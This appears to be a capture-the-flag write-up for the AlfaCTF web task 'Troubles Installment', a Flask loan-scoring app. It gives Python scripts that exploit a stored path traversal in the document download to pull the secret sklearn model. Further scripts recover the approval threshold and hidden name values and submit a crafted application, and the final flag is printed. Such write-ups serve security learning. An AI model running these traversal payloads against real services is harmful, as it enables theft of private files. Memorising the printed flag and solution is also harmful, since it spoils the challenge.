webfreehard

Troubles Installment

alfactf

Task: Flask credit scoring app with ML-based loan approval; ULTRA-LOW-RISK product reveals flag but requires ML model approval. Solution: path traversal in document download to extract sklearn model, reverse engineer threshold and special categorical values, craft application that passes ML scoring.

$ ls tags/ techniques/
path_traversal_via_db_fieldml_model_extractionsklearn_model_reverse_engineeringfeature_bruteforcethreshold_bypass

Troubles Installment — AlfaCTF

Description

A credit scoring web application "Karabin Capital" where users can submit loan applications. The goal is to get an approved "ULTRA-LOW-RISK" loan which reveals the flag.

The application is a Flask web service with PostgreSQL backend. Users register, submit loan applications with personal and financial data, and receive approval decisions. Applications with amount <= 10000 are auto-approved as MICRO-CASH. Larger amounts go through an ML scoring model (sklearn RandomForestClassifier). The ULTRA-LOW-RISK product requires amount >= 500000 AND ML model approval (probability >= threshold), and reveals the flag upon approval.

Analysis

Application Architecture

  • Flask web application with PostgreSQL database
  • ReportLab for PDF document generation
  • sklearn RandomForestClassifier for credit scoring
  • Two-tier approval logic:
    • amount <= 10000: auto-approved as MICRO-CASH
    • amount > 10000: requires ML model scoring

Vulnerability Discovery

The vulnerability is in the download_document function (app.py lines 820-864):

@app.get("/api/applications/<application_id>/document") def download_document(application_id: str) -> Response: ... base_dir = STORAGE_ROOT / user["public_uuid"] / user["login"] unsafe_path = base_dir / row["name"] # row["name"] = application_name from DB safe_path = safe_document_path(user, row["name"]) ... target_path = unsafe_path if unsafe_path.exists() else safe_path file_bytes = target_path.read_bytes() # Reads arbitrary file!

The application_name field from the database is used directly in file path construction without sanitization. When creating an application, the user controls the application_name field, which gets stored in the database and later used to construct the file path for document download.

Path Traversal Calculation

  • Base path: /srv/karabin/data/storage/{uuid}/{login}/
  • Target file: /srv/karabin/secrets/karabin-ratebook (the ML model)
  • Traversal payload: ../../../../secrets/karabin-ratebook

Solution

Step 1: Extract the ML Model via Path Traversal

import requests BASE_URL = 'https://capital-xxx.alfactf.ru' session = requests.Session() # Register a new user session.post(f'{BASE_URL}/api/register', json={ 'login': 'attacker01', 'password': 'password123' }) # Create an application with path traversal in the name # Amount <= 10000 ensures auto-approval (needed to get document_url) application_data = { 'application_name': '../../../../secrets/karabin-ratebook', 'birth_date': '1990-01-01', 'last_name': 'Test', 'first_name': 'Test', 'patronymic': 'Test', 'annual_income': 100000, 'monthly_expenses': 5000, 'amount': 5000, # <= 10000 for auto-approve 'term_months': 12, 'karabin_payroll_project': '0', 'housing_type': 'Rented apartment', 'occupation_type': 'IT staff', 'education_type': 'Higher education', 'family_status': 'Single / not married' } response = session.post(f'{BASE_URL}/api/applications', json=application_data) app_id = response.json()['application']['id'] # Download the "document" - actually retrieves the ML model! response = session.get(f'{BASE_URL}/api/applications/{app_id}/document') # Content-Type will be application/octet-stream (not PDF) with open('karabin-ratebook', 'wb') as f: f.write(response.content)

Step 2: Analyze the ML Model

import joblib import pandas as pd # Load the extracted model bundle bundle = joblib.load('karabin-ratebook') print(bundle.keys()) # ['pipeline', 'threshold', 'features'] # Critical finding: approval threshold print(f"Threshold: {bundle['threshold']}") # 0.93 pipeline = bundle['pipeline'] # Pipeline structure: ColumnTransformer (preprocessor) + RandomForestClassifier # Extract categorical feature encodings preprocessor = pipeline.steps[0][1] cat_encoder = preprocessor.named_transformers_['categorical'] # Discovered CTF-specific categories hidden in the model: # LAST_NAME categories include: 'Цтфный' (CTF hint!) # FIRST_NAME categories include: 'Лев' # PATRONYMIC categories include: 'Альфабанкович' (CTF hint!)

Key findings from model analysis:

  • Threshold = 0.93: Need probability >= 0.93 for ULTRA-LOW-RISK approval
  • CTF-specific names: The model was trained with special categorical values that give high approval probability:
    • Last name: "Цтфный" (literally "CTF-like")
    • First name: "Лев"
    • Patronymic: "Альфабанкович" (contains "Alfa" - the CTF organizer)

Step 3: Find Winning Parameters

Bruteforce search to find parameter combination achieving probability >= 0.93:

import numpy as np from itertools import product # Test the CTF-specific profile profile = { 'LAST_NAME': 'Цтфный', 'FIRST_NAME': 'Лев', 'PATRONYMIC': 'Альфабанкович', 'AGE_YEARS': 35, 'AMT_INCOME_TOTAL': 5000000, 'REQUESTED_AMOUNT': 1000000, 'REQUESTED_TERM_MONTHS': 36, 'MONTHLY_EXPENSES': 100000, 'KARABIN_PAYROLL_PROJECT': 1, 'NAME_HOUSING_TYPE': 'Office apartment', 'OCCUPATION_TYPE': 'High skill tech staff', 'NAME_EDUCATION_TYPE': 'Higher education', 'NAME_FAMILY_STATUS': 'Married', } df = pd.DataFrame([profile]) proba = pipeline.predict_proba(df)[0][1] print(f"Probability: {proba}") # 0.9915 >= 0.93 ✓

Step 4: Submit Winning Application

# Calculate birth date for age 35 from datetime import date birth_date = date(1991, 1, 15) # Results in age ~35 winning_application = { 'application_name': 'ULTRA_LOW_RISK_WIN', 'birth_date': '1991-01-15', 'last_name': 'Цтфный', 'first_name': 'Лев', 'patronymic': 'Альфабанкович', 'annual_income': 5000000, 'monthly_expenses': 100000, 'amount': 1000000, # >= 500000 for ULTRA-LOW-RISK 'term_months': 36, 'karabin_payroll_project': '1', 'housing_type': 'Office apartment', 'occupation_type': 'High skill tech staff', 'education_type': 'Higher education', 'family_status': 'Married' } response = session.post(f'{BASE_URL}/api/applications', json=winning_application) data = response.json()['application'] print(f"Status: {data['status']}") # approved print(f"Product: {data['product_code']}") # ULTRA-LOW-RISK print(f"Flag: {data['flag']}") # alfa{b4NK_CreDIt_ScoR3_was_5Tol3N_4ND_lo4n_w45_r3cEIV3d}

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md

$ grep --similar

Similar writeups